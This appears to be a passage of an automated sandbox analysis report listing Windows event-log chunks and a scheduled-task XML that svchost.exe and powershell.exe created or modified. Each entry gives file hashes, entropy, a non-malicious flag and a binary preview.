                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...6.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.S.o.u.r.c.e.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.S.o.u.r.c.e.>..... . . . .<.A.u.t.h.o.r.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.A.u.t.h.o.r.>..... . . . .<.V.e.r.s.i.o.n.>.1...0.<./.V.e.r.s.i.o.n.>..... . . . .<.D.e.s.c.r.i.p.t.i.o.n.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.1.).<./.D.e.s.c.r.i.p.t.i.o.n.>..... . . . .<.U.R.I.>.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.S.o.f.t.w.a.r.e.P.r.o.t.e.c.t.i.o.n.P.l.a.t.f.o.r.m.\.S.v.c.R.e.s.t.a.r.t.T.a.s.k.<./.U.R.I.>..... . . . .<.S.e.c.u.r.i.t.y.D.e.s.c.r.i.p.t.o.r.>.D.:.P.(.A.;.;.F.A.;.;.;.S.Y.).(.A.;.;.F.A.;.;.;.B.A.).
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):64
                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:@...e...........................................................
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2392
                                                                                                    Entropy (8bit):3.683052602443591
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:MUt4srP+sXCrPwfFRVEfWb3/OoNLnyTL3WI:nWOCrup/vOoN6LGI
                                                                                                    MD5:E0B94D021546D9C2D2569135701BA341
                                                                                                    SHA1:B8816B4ECC03C1196D100FD172A2B4EA083AEBDB
                                                                                                    SHA-256:22D1F9B75BFF02784E3D1D33B1CFA2FA9581E9C8FA35E55A60AC791B090529DB
                                                                                                    SHA-512:6F8ECC400A47B9F50E6AD379FD527E7BDD30B4BC1432D06B8BEFC8D212045B6E46E6BA6AA0CDDD004F326FB5F7AA588F532A0BE0D5E8E6029BA92188402DAE4C
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:ElfChnk.................W.......W...............X.....;.....................................................................E.v.............................................=...........................................................................................................................g...............@...........................n...................M...]...........................h.......................&...............................................................................................**..X...W..........W...........AO&.........AO...]}....RU........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Z............{..P.r.o.v.i.d.e.r...7...F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.S.P.P.F........)...G.u.i.d.....&.{.E.2.3.B.3.3.B.0.-.C.8.C.9.-.4.7.2.C.-.A.5.F.9.-.F.2.B.D.F.E.
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.267757496589592
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:S8hv3FV/EB7N+W8wi3WzWxFyJOrXs8a0NR0HCl3ToXLpuRrepf:7R87N+twisIrXs8a0NR0i1ToXerepf
                                                                                                    MD5:5B63277E9724257670612BBB56348485
                                                                                                    SHA1:61351291C2570EC1C87142932C88050C6448BB4D
                                                                                                    SHA-256:285519EB88AD4F6DA66D770268661E19CAAB24A9B27F8F06F63124C13A8C61C0
                                                                                                    SHA-512:4563BFD9F1D93D4E0EFE6A7EFE5C5153AF9B4617C62EAC0B0D0794FA2C8B6706B87C930E8F7939C7F0634E9DC15E598E8F75740141E607D4EBD1F696072DFE10
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:ElfChnk.x...............x....................0..`2..........................................................................xP.................0...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................9)..................................................**..`...x.......Q.............{Y.&........{Y..JgV.@..y...........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):66960
                                                                                                    Entropy (8bit):4.218550472968928
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:f+4VnVVfh8fVyKVNPVV6CVT3Vp0VNxVtOVNTVwahVv9VmXVo/VumVYLVK8VVpVbf:fZcfE080p82C
                                                                                                    MD5:B8533297E2E964C2CF691137C7D8BA1E
                                                                                                    SHA1:8E5616B106576CB600A7AB0DB1A87FFA7CEFE69B
                                                                                                    SHA-256:CD67B00DF707E2293BA77EA78914C926B06FA5C6D6D93469C2C38C214275292A
                                                                                                    SHA-512:58A816AF91775E29EE4F104ECC02FB4120ECD71C6BB4C4F732EF3DF3CD7E24CE444BC686BAE006648C0BA347742FB32645651158C0C0135B9E85EE21D375790D
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:ElfChnk..-.......-.......-.......-..........0........q.B........................................................................................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...................................................................................................................................................**.......-..........W..........{Y.&...............................................................@.......X...a.!.....E..........@....W...C.."......"............-...................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t...'..Y.J.R>:..=_M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t./.O.p.e.r.a.t.i.o.n.a.l...f.d.........N...M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s...S.e.a.r.c.h._.c.w.5.n.1.h.2.t.x.y.e.w.y............**.......-..........W..........{
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):126976
                                                                                                    Entropy (8bit):4.49887204986715
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:fhuoS9VoryorOoroortorVorVorNorrmo4orNRoPNorGoryoIAcolL3oJ7oQjoby:fsWflkzHVhsWflkzHV
                                                                                                    MD5:6515BA0DE292719FFBFB0DAC79502B26
                                                                                                    SHA1:A63FB897EE0B0438566AE122E591FAF2DADD3CD4
                                                                                                    SHA-256:FB0FAA8F49E025874FA598F64630495417E542C40CD6BBA08356BA0CCF0E2388
                                                                                                    SHA-512:9F25466788C30B656CA42E8BA1A337186B6C2CB78AAC58AB822359C091E92ECA086825562CF273F76D752A9E3C78E64CA015DF7A3E2DEB9CAB0518BE7995BBF2
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:ElfChnk.........b...............b....................n.......................................................................Ws9................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F................................................................&...................................!..............}...............................**................@.S...........w.&.........w..._.|.1+O.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.080997150443083
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:PqyEuJerqVdWqfSGwMblcavHCmu2CeXlWg:PE2er2xSGwMlcaviWVXll
                                                                                                    MD5:7059DD99BE646AB9B35F7F3970A5628D
                                                                                                    SHA1:B4006841E5A1EEB5BDA79B12E5F482A500793E52
                                                                                                    SHA-256:5DD63ECCADE1A007F0905A3F1754E3FABF2031DEFD90D485230649557C48D12C
                                                                                                    SHA-512:043DCCBD13E69A847FDB1B81E8D67783FFA57899EA7FCE8D4C52D88ECDB0297D25698C7D738C4EC165D85FBE61CC93BFCDC965B0735CAF77C819E9BCB32A66FC
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:ElfChnk.........(...............(...........PH...I....TU....................................................................3...................d...........................=...........................................................................................................................f...............?...........................m...................M...F.......................&....................................................................................................;......................**..............Y_:#T...........w.&.........w..._.|.1+O.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.094860420471812
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:tdFO29ni/it1gsoz1JWObKNKTF0fjUVcRMsHeO5xneFYrj0wYF8OEU3mZMv5BAQW:E2a4wE4zR+d
                                                                                                    MD5:08DFEB917A3172F6BD860322D099F6FB
                                                                                                    SHA1:58C3AD6E92BBA8C8F163BEFD4BDD42AEB09E151B
                                                                                                    SHA-256:5F75CE7D48E70E034060E8541BFCE50E938EDA5AB0CA2C31BD1E6C03E6EC96E8
                                                                                                    SHA-512:29D612AED143C2209CB3F364EEC8C7332D0E50CA76A8FB8D854D2961903EC69323D33DDF64BA924A70414645BA38A71234EF6CC3608A687720DB103AC67C958E
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:ElfChnk.........................................x!..........................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................g...................................&.......................**...............8.l$..........{Y.&........{Y..JgV.@..y...........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):98648
                                                                                                    Entropy (8bit):3.2945400348665483
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:lxGxaXjUc+l9g8EUalFUr7XkelW3nvPdly7WDmu0lbuyuq0lP6+xwEe0+N/To5YG:RZZ7x8ZZ7xA
                                                                                                    MD5:76A992E05C417E4CB8AF57FB336A6AA8
                                                                                                    SHA1:D533F4C96E44B896D102A7DCC9C2A4F275A25416
                                                                                                    SHA-256:4BE0905E9E19B4F0E7D900D4329D8D8DA8EFD92528813756E9377D4256E0648B
                                                                                                    SHA-512:ACAA0115BD9BBF58922AAF85C82C723DC0647B945E260C986774F4E26C0FC5A888695366EC8F40D4F497D83F998BADEA1C1DFA97A91C7D0804BA39D663D69EEA
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:ElfChnk.|...............|....................{..h}..:.).....................................................................o..................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................................&.......................**......|.....................{Y.&........{Y..JgV.@..y...........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):5.695111276420338
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:khFa58wH2KpzyzIzOa5o2H2KpzyzIzHa5azuzNz0zxzuewKWMKja544a5azuzNz+:k/VH1s6WdTN
                                                                                                    MD5:8D8BBFE3B12F6A85D2CD48BA2B839DCE
                                                                                                    SHA1:E4A523CC7B0B54F3BA0171E0179A70913532C37A
                                                                                                    SHA-256:0B394D6903D1E14C17F4322BA153709BCC59AA90F1D571599A14D2C53FC87EE0
                                                                                                    SHA-512:7455085AD3EF8AA0F81D4966B0189D91B5D4570F5654D72CBA2D246CE880D144DC06F28E1A86FA91F2726A8CFCF9A4A78B27632C71F44B37E20AF7BFA617B3BE
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:ElfChnk.C.......[.......C.......[...............p......n.....................................................................)..........................................8...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................................&...........93..........**......C.......dM.(#..........{Y.&........{Y..JgV.@..y...........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):76320
                                                                                                    Entropy (8bit):4.404305072391989
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:krpTPi9TM2bw8QagXkiCvdgRACd40B7pT6:0Li9TMAw8QZXRCvdKY0a
                                                                                                    MD5:2E6FE41A2A191519F86A8432E0D87C35
                                                                                                    SHA1:929ABAF6745F178DF17CEB173BD3FD58B7D28E8D
                                                                                                    SHA-256:1E503116A530827E304AD271B53B1D838AACE2F62CC1EEF1FDCAEDAC03328E59
                                                                                                    SHA-512:18298C227FFA35F03A729C66C2D4E2F45D1A4D074881A417372B16C2C54FB0D51B0E47CF32D825B8AD5DF4BF49CF8AA5F121D4E493087E606D516069B0F0A731
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:ElfChnk.................s.......x...........0........$u......................................................................O..................0...........................=...........................................................................................................................f...............?...........................m...................M...F...................................................................................................................................................**..`...s..........W..........{Y.&........{Y..JgV.@..y...........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.979080975877929
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:1RsVrujhzfmf8DXi1wgEigjxfyByfFTbnQjCT:cr2fmf719E
                                                                                                    MD5:9D77D07081EEBFA5232F271A967AA0BA
                                                                                                    SHA1:F6CC0506EBD497881A49299935F888A806D478B8
                                                                                                    SHA-256:C68717894DACDF86C18715A1370E42AB77B88C58ED24E2CA298274DD2C48D0B3
                                                                                                    SHA-512:F4BE2DEF306EE2C383E3A957C5427D190FCBB8ACAFC68E95C04A678AA93625FB15862352698AC4436DBC9D8B8C485D9E66C547F758645A6E3A1138C44A9AA9D9
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:ElfChnk.. ....... ....... ....... ...........-.../.....L....................................................................^54.................^...........................=...........................................................................................................................f...............?...........................m...................M...F.........................................../#......................................................................7.......&.......................**....... ......^|.l$..........{Y.&........{Y..JgV.@..y...........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.240004525136968
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:ghuvnvmvJvBvdvrvwvSvovl+v4v6vvvmvcMvOyv4vCvQpv9gsvTSvhvuvXvKt9vF:gNzX/gbt/H3lWmnLJy2
                                                                                                    MD5:053AEE0BFA166B99B86C16052BA61F87
                                                                                                    SHA1:6F6BB32D3B73D540148A19BBE9F4E8B7A55CDFB6
                                                                                                    SHA-256:99D608084E66517191578BBC5680B36DD29BE43EC7C3DCD6F1CE7483A49D20CD
                                                                                                    SHA-512:B2E2BCFD4C1FB4E22A783051A5CDD8F6073D8AF89FF1A2D2560EE1FB026400DB725CC4060F415E5F1A58A2C41C5D78FA2081FA9FB4074351AA6336870951CBD1
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:ElfChnk.........^...............^..................<..x......................................................................L.................v...........................=...........................................................................................................................f...............?...........................m...................M...F.......................&.......................................f ..........................................................&)......................**..............l..-T...........w.&.........w..._.|.1+O.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 55, DIRTY
                                                                                                    Category:modified
                                                                                                    Size (bytes):1052672
                                                                                                    Entropy (8bit):0.5660138186433984
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:73MEYS9jvhCeqi4XdxxbXmNcD2fGbaBxXb3YYXUeLIU1smJYkO9HeWHlBxln2vlF:TMEYw5NH
                                                                                                    MD5:22A3562D75C0086E31CBF024EA704BD0
                                                                                                    SHA1:94C202AC7DCC266FCFD6F83FAE63AF2DA388A497
                                                                                                    SHA-256:14F317BB9E2190805E9B87EFF91B8E1195550BAD7A984827F11D2E879FFB7AC1
                                                                                                    SHA-512:7032281EB433CC3D6770D8F5F6C47B2DB2C32ED3193114189AA3ADB3203D418FFFDDFA4BCB8ECCB6B88BAEF26E1C3A571D6F1284153FD1D6D1A2644C8F846A77
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:ElfFile.................7...................................................................................................u.Y.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.317994746558986
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:+hX2k2TX2ZsCixCVCQCU2sT28h2b2b2p212/2V2b2S2BCACECJCe2a2F2MA2p22H:+f58V6Oqx8JA/cqS1Ll
                                                                                                    MD5:A4223CE544EB95B2DCEE178FBD8FD78E
                                                                                                    SHA1:4AA71B07814285E13E0868C646D29D64A71BA254
                                                                                                    SHA-256:7BD4A8C27A63A2E5C31CC1C53B06DDF38F0AEB873F50AB7487FF0618CAB86D4F
                                                                                                    SHA-512:FB6CFC8603C6735D00A6916FF1F0144AA023D35699D5144F8127C993D0E4AD578FA60BB8F05F93C148018FEE9539E0505728D817DDCCEEA156DF2E860723A66C
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:ElfChnk.s...............s...................`.......M.......................................................................E ..................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................IH...............................................................................................4......................**......s..........i..........{Y.&........{Y..JgV.@..y...........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):3.3588910510411125
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:G2+fFhoPP62zZ9RmAZNWojO/OTreg8qsLzXEOTLe1I2AvmaBp5VlCawbn2DkbwyR:GJfToH6oZ7msNfjUO3eBqqz0OPei2emP
                                                                                                    MD5:80E24626B6292FD7151D4DF349D1B0C5
                                                                                                    SHA1:4F4ADCBDE40B9E5036016CC0D937BF4901BA7EA1
                                                                                                    SHA-256:DCB3B7FAF6B4AFCB0C03F7E0F38C60C86D806C4B5DE3CDC47FDD29BB6811397F
                                                                                                    SHA-512:22E4318D34F73F1C7AD333DF451C0F7ED14FB402F6F69DEE59DB8D5532AD1A175F40E221EAEF0C6A44D601E44E9DB82D086C24BDA70D51D2ECB1D9C763518EAC
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:ElfChnk.*.......~.......*.......~....................68.....................................................................Jt.................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................................&.......................**......*.......".}B...........{Y.&........{Y..JgV.@..y...........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.452839496763712
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:BM8VCAwXxyoKPCZ5vqb+k+IlXERQDr9MYL2J/ZUDrEuZlf3YiBJbh+C/JByBr8Er:BM8VnwXxyoKPCZ5vqb+k+IlXERQDr9M/
                                                                                                    MD5:B9A3BDD59625065EE1D0326E78F5D1F1
                                                                                                    SHA1:37A70119577B640B557FDDCA5AACDEF2A6A14E47
                                                                                                    SHA-256:C71BEB278D0D745E60193BB7A4871DD8D92ECA67543342BB55BE9171A8FCC09C
                                                                                                    SHA-512:B59AE5D4D6277802BCD3D2605CF0C19BAF7C36993C771F542BEC3EAC629BA79F1295EADF8F94BE8336E3EB1C6458BEF92E2988E3B652EE19BB86B6A7806073B1
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:ElfChnk.^"......g"......^"......g"....................lZ......................................................................................0...........................=...........................................................................................................................f...............?...........................m...................M...F...................................................................................................................................................**..`...^"......|}..W..........{Y.&........{Y..JgV.@..y...........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):140760
                                                                                                    Entropy (8bit):4.74630194204064
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:HjJ95bO9lyedoI/TYAjryxGdJNDjJ95bO9lyedoI/TYAjryxGdJNHCUp:fBGhTBGhV
                                                                                                    MD5:8D7DCDE6285555183A2A0857A18E9473
                                                                                                    SHA1:1523A37E93BC2D733D53FDE0D7724C8308B26F2D
                                                                                                    SHA-256:FEA493F76D13C11E886BE15C38809E5D5B4702E4CFC4F516F8E675C74DDE9158
                                                                                                    SHA-512:C6853EE0B17E423FEE1E74A9B2CD160EAE8B52DAD59692A0C02441746963795D9106A5B82B323FFFA8C2571A983A85A3E7D380C2D760ACCE3AB5AF6EC6E4DA44
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:ElfChnk.iV.......V......iV.......V...........................................................................................\<.........................................D...=...........................................................................................................................f...............?...........................m...................M...F...............................M0...........................y.......................................}......................&.......................**......iV......9/.&$..........{Y.&........{Y..JgV.@..y...........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):1.5006748241629104
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:SjhSiFQke1kNkqkvokekckFko8dk1kHkskAkTgkXkbkSGkJRk36k0s3kHEnpddpu:MbQmc+s
                                                                                                    MD5:78F2E3D5DB435AB0A5E1CDBA5F4A84F4
                                                                                                    SHA1:677C015C65E8C529037B8189AC877A19763B6EF7
                                                                                                    SHA-256:10D945D51E045B212DC5E26E70E1D21503C9D8D3CE4E4D264A2C3C99E9D2C11B
                                                                                                    SHA-512:41A605E36AF5C35D0CD905886F06974A7E19AF4C37B9BA996DED3BB295BA085CD7A0FBECBC23B847CB82A4CED3714A35CABFE8503B906B219BA7782713E49B6A
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
